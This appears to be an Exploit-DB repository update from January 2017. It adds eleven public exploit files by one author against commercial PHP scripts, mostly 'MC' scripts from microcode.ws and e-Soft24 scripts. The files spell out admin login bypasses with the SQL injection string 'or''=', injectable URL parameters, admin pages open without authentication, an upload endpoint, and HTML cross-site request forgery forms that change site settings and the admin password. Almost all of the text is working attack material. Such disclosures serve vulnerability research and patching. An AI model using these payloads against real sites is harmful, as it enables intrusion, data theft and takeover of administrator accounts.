DB: 2017-01-16

11 new exploits

9 Network Linkedin Clone Script - Improper Access Restrictions
Article Directory Script Seo 3.2 - Improper Access Restrictions
e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass
MC Smart Shop Script - SQL Injection
MC Buy and Sell Cars Script 1.1 - SQL Injection
MC Yellow Pages Script - SQL Injection
MC Real Estate Pro Script - Improper Access Restrictions
MC Hosting Coupons Script - Cross-Site Request Forgery
MC Inventory Manager Script - Multiple Vulnerabilities
MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions
MC Documentation Creator Script - SQL Injection

files.csv

@@ -36995,5 +36995,16 @@ id,file,description,date,author,platform,type,port
 41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
 41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
 41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41060,platforms/php/webapps/41060.txt,"9 Network Linkedin Clone Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
 41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
 41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41061,platforms/php/webapps/41061.txt,"Article Directory Script Seo 3.2 - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
+41062,platforms/php/webapps/41062.txt,"e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass",2017-01-15,"Ihsan Sencan",php,webapps,0
+41063,platforms/php/webapps/41063.txt,"MC Smart Shop Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
+41064,platforms/php/webapps/41064.txt,"MC Buy and Sell Cars Script 1.1 - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
+41065,platforms/php/webapps/41065.txt,"MC Yellow Pages Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
+41066,platforms/php/webapps/41066.txt,"MC Real Estate Pro Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
+41067,platforms/php/webapps/41067.html,"MC Hosting Coupons Script - Cross-Site Request Forgery",2017-01-15,"Ihsan Sencan",php,webapps,0
+41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
+41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
+41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41060.txt

@@ -0,0 +1,23 @@
+# # # # # 
+# Vulnerability: Improper Access Restrictions 
+# Date: 15.01.2017
+# Vendor Homepage: http://theninehertz.com
+# Script Name: 9 network Linkedin Clone – Classified Ads Script
+# Script Version: v1.0
+# Script Buy Now: http://theninehertz.com/linkedin-clone
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/MyCP/welcome.php
+# http://localhost/[PATH]/MyCP/industry-list.php
+# http://localhost/[PATH]/MyCP/active_user.php
+# http://localhost/[PATH]/MyCP/deactive_user.php
+# http://localhost/[PATH]/MyCP/unverified_user.php
+# http://localhost/[PATH]/MyCP/job-list.php
+# http://localhost/[PATH]/MyCP/job-pack.php
+# Vs.......
+# # # # # 

platforms/php/webapps/41061.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Vulnerability: Improper Access Restrictions 
+# Date: 15.01.2017
+# Vendor Homepage: http://www.e-soft24.com/
+# Script Name: Article Directory Script Seo
+# Script Version: V3.2
+# Script Buy Now: http://www.e-soft24.com/article-directory-script-seo-p-338.html
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/alldoc.php
+# http://localhost/[PATH]/admin/editdoc.php
+# http://localhost/[PATH]/admin/editdoc.php?doc_id=1
+# Vs.......
+# # # # # 

platforms/php/webapps/41062.txt

@@ -0,0 +1,13 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 15.01.2017
+# Vendor Homepage: http://www.e-soft24.com/
+# Script Name: Jokes Portal Script Seo
+# Script Version: v1.3
+# Script Buy Now: http://www.e-soft24.com/jokes-portal-script-seo-p-370.html
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/siteadmin/ and set Username:anything and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41063.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Vulnerability: SQL Injection Web Vulnerability
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Smart Shop Script
+# Script Buy Now: http://microcode.ws/product/mc-smart-shop-php-script/3855
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?id=[SQL]
+# http://localhost/[PATH]/product.php?p=[Permalink]&id=[SQL]
+# http://localhost/[PATH]/category.php?p=[SQL]
+# http://localhost/[PATH]/product.php?p=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# 
+# Admin Login Bypass
+# http://localhost/[PATH]/adminlogin.php and set Mail:1@1.com and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41064.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Vulnerability: SQL Injection Web Vulnerability
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Buy and Sell Cars Script
+# Script Version: V1.1
+# Script Buy Now: http://microcode.ws/product/mc-buy-and-sell-cars-php-script/3878
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/car.php?c=[SQL]
+# http://localhost/[PATH]/car.php?c=[Permalink]&id=[SQL]
+# http://localhost/[PATH]/cateogry.php?p=search&cage=all&manufacturer=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# 
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41065.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Vulnerability: SQL Injection Web Vulnerability
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Yellow Pages Script
+# Script Buy Now: http://microcode.ws/product/mc-yellow-pages-php-script/3800
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/details.php?list_id=[SQL]
+# http://localhost/[PATH]/category.php?cat_id=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# 
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41066.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Vulnerability: Improper Access Restrictions 
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Real Estate Pro
+# Script Buy Now: http://microcode.ws/product/mc-real-estate-pro-php-script/3858
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/AddPropertyType/apt
+# http://localhost/[PATH]/admin/AddNewState/Add_State
+# http://localhost/[PATH]/admin/AddNewCity/Add_City
+# http://localhost/[PATH]/admin/SliderTable/st
+# Vs.......
+# # # # #

platforms/php/webapps/41067.html

@@ -0,0 +1,28 @@
+# # # # # 
+# Vulnerability: Cross-Site Request Forgery
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Hosting Coupons Script
+# Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Other features have the same security vulnerability.
+# Exploit:
+<html>
+<body>
+<form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form">
+<label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br>
+<input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br>
+<label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br>
+<input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords"  placeholder="Write website keywords..." /><br>
+<label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br>
+<input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br>
+<label for="website_desc" class="control-label col-lg-4">Website Description</label><br>
+<textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br>
+<input type="submit" name="sub" value="Submit" class="btn btn-primary" />
+</form>
+</body>
+</html>
+# # # # #

platforms/php/webapps/41068.txt

@@ -0,0 +1,37 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Inventory Manager
+# Script Buy Now: http://microcode.ws/product/mc-inventory-manager-php-script/3885
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# # # # # 
+# http://localhost/[PATH]/dashboard.php?p=view_sell&id=[SQL]
+# http://localhost/[PATH]//dashboard.php?p=edit_item&id=[SQL]
+# E.t.c.... 
+# Other features have the same security vulnerability.
+# Exploit:
+<html>
+<body>
+<form action="http://localhost/[PATH]/functions/save_password.php" method="post" parsley-validate>
+<fieldset>
+<label>Change Password : </label>
+<input type="password" placeholder="Type new password" name="password" required/>
+</fieldset>
+<fieldset>
+<label>Re-type Password : </label>
+<input type="password" placeholder="Re-Type password again" name="repassword" required/>
+</fieldset>
+<button type="submit" class="btn btn-sm btn-success">Save
+<i class="icon-arrow-right icon-on-right bigger-110"></i>
+</button>
+</form>
+</body>
+</html>
+# # # # #
+# # # # # 

platforms/php/webapps/41070.txt

@@ -0,0 +1,26 @@
+# # # # # 
+# Vulnerability: Improper Access Restrictions
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Coming Soon Script
+# Script Buy Now: http://microcode.ws/product/mc-coming-soon-php-script/3880
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# 
+# http://localhost/[PATH]/admin/slider.php
+# file.php upload 
+# http://localhost/[PATH]/admin/imageslider/file.php
+# 
+# http://localhost/[PATH]/admin/launch_time.php
+# http://localhost/[PATH]/admin/launch_message.php
+# http://localhost/[PATH]/admin/send_message.php
+# http://localhost/[PATH]/admin/subscribers.php
+# http://localhost/[PATH]/admin/settings.php
+# http://localhost/[PATH]/admin/users.php
+# Vs.......
+# # # # #

platforms/php/webapps/41071.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Vulnerability: SQL Injection Web Vulnerability
+# Date: 15.01.2017
+# Vendor Homepage: http://microcode.ws/
+# Script Name: MC Documentation Creator
+# Script Buy Now: http://microcode.ws/product/mc-documentation-creator-php-script/3890
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin/dashboard.php?doc=[SQL]
+# http://localhost/[PATH]/admin/dashboard.php?docedit=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# 
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter.
+# # # # #